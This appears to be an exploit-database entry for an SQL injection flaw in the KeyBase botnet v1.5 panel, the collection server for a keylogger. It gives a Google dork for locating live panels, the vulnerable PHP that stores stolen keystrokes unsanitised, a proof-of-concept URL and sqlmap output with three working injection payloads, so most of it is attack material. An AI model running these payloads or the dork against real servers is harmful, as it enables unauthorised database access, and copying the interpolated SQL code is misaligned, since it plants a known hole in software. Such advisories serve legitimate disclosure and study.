KeyBase Botnet v1.5 - SQL Injection Vulnerability

vendor:

KeyBase Botnet

by:

n4pst3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: KeyBase Botnet

Affected Version From: v1.5

Affected Version To: v1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:unkn0wn:unkn0wn

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10, Debian 7

2018

KeyBase Botnet v1.5 – SQL Injection Vulnerability

KeyBase Botnet v1.5 is vulnerable to SQL Injection via the 'machinename' GET parameter. An attacker can exploit this vulnerability to gain access to the database and execute malicious SQL queries. The payload used in the PoC is 'type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

################################
# Exploit Title: KeyBase Botnet v1.5 - SQL Injection Vulnerability
# Google Dork: intitle:"KeyBase: Login" + intext:"( Login to get access to your logs )"
# Date: 3/12/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: v1.5
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: post.php - variant "keystrokes, passwords, clipboard" & "machinename, machinetime"
if ($_GET['type'] == 'keystrokes')
{
$sqlk = "CREATE TABLE if not exists Keystrokes (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, machinename VARCHAR(255) NOT NULL, windowtitle VARCHAR(255) NOT NULL,
keystrokestyped VARCHAR(255), machinetime VARCHAR(255) NOT NULL, ipaddress VARCHAR(255) NOT NULL, date TIMESTAMP)";

if ($conn->query($sqlk) === TRUE) {
    $sqlinsertk ="INSERT INTO Keystrokes (id, machinename, windowtitle, keystrokestyped, machinetime, ipaddress, date) VALUES (NULL, '$machinename', '$windowtitle', '$keystrokestyped', '$machinetime', '$ipaddress', '$date')"; 

    if ($conn->query($sqlinsertk) === TRUE) {
       echo "<br>Success";
}else{
echo "<br>Error:" . $conn->error;
} } else {
    echo "<br>Error:" . $conn->error;
}
################################
PoC:

http://127.0.0.1/post.php?type=keystrokes&machinename=[SQLi]1&machinetime=[SQLi]

################################
Response: 

GET parameter 'machinename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 410 HTTP(s) requests:
---
Parameter: machinename (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: type=keystrokes&machinename=1' AND (SELECT 9909 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(9909=9909,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwid'='gwid&machinetime=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: type=keystrokes&machinename=1' AND SLEEP(5) AND 'MWry'='MWry&machinetime=1